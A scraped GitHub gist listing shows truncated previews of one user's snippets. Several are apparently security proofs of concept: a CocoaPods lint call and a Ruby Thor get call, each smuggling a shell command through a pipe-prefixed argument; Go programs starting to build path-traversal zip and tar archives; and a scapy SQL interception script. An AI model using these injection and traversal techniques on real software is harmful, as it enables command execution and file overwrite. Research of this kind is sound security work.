Skip to content

Instantly share code, notes, and snippets.

Michael Marek ecneladis

Block or report user

Report or block ecneladis

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View keybase.md

Keybase proof

I hereby claim:

  • I am ecneladis on github.
  • I am ecneladis (https://keybase.io/ecneladis) on keybase.
  • I have a public key ASA-QJvmS7xazTLNCuqXhhaFp8-904eA3dtM89QLwfrY1wo

To claim this, I am signing this object:

View cocoapods.rb
# https://github.com/CocoaPods/CocoaPods/blob/cae98c5386f7d80d6fe065c3f081ce130628151a/lib/cocoapods/command/spec/lint.rb#L100-L107
pod spec lint "|touch /tmp/test;\nhttps://url.co"
View dotzip.go
package main
import (
"archive/zip"
"os"
"log"
)
func main() {
f, err := os.Create("traversal.zip")
View dottar.go
package main
import (
"archive/tar"
"os"
"log"
)
func main() {
f, err := os.Create("traversal.tar")
View sqlmitm.py
from scapy.all import *
import unicodedata
import sys, getopt
import time, datetime
import argparse
import socket
import fcntl
import struct
import threading
@ecneladis
ecneladis / service-checklist.md
Created Sep 12, 2016 — forked from acolyer/service-checklist.md
Internet Scale Services Checklist
View service-checklist.md

Internet Scale Services Checklist

A checklist for designing and developing internet scale services, inspired by James Hamilton's 2007 paper "On Desgining and Deploying Internet-Scale Services."

Basic tenets

  • Does the design expect failures to happen regularly and handle them gracefully?
  • Have we kept things as simple as possible?
@ecneladis
ecneladis / 00-about-search-api-examples.md
Created Aug 12, 2016 — forked from jasonrudolph/00-about-search-api-examples.md
5 entertaining things you can find with the GitHub Search API
View 00-about-search-api-examples.md
@ecneladis
ecneladis / gist:6cbe26ebe3f862663ea4f11bef4bb54b
Created Jun 27, 2016 — forked from mikemaccana/gist:10847077
Tptacek's Review of "Practical Cryptography With Go"
View gist:6cbe26ebe3f862663ea4f11bef4bb54b

Wow. I've now read the whole book and much of the supporting code. I'm not a fan, and recommend against relying on it. Here's a laundry list of concerns:

  • The teaching method the book uses is badly flawed. The book's strategy is to start simple and build to complexity, which makes sense if you're teaching algebra but not if you're teaching heart surgery. The result is that each chapter culminates with the implementation of a system that is grievously insecure. Little warning is given of this, apart from allusions to future chapters improving the system. For instance, Chapter 2 closes with a chat system that uses AES-CBC without an authenticator.

  • The book is full of idiosyncratic recommendations. For instance, AES-CBC requires a padding scheme. There is a standard padding scheme. The book purports to present it, but instead of PKCS7, it presents 80h+00h..00h.

  • At one point about 1/3rd of the way through the book, it suggests using a SHA256 hash of the plaintext as an authenticator for a message. Thi

@ecneladis
ecneladis / thor_cmd_exec.rb
Created Jan 8, 2016
Code execution in Thor::Actions#get
View thor_cmd_exec.rb
#!/usr/bin/env ruby
require 'thor'
class CLI < Thor
include Thor::Actions
desc "cmd_exec", "cmd_exec poc"
def cmd_exec()
get "|uname -a > cmd_exec_test;\nhttps://gist.github.com", "/tmp/dsadas"
You can’t perform that action at this time.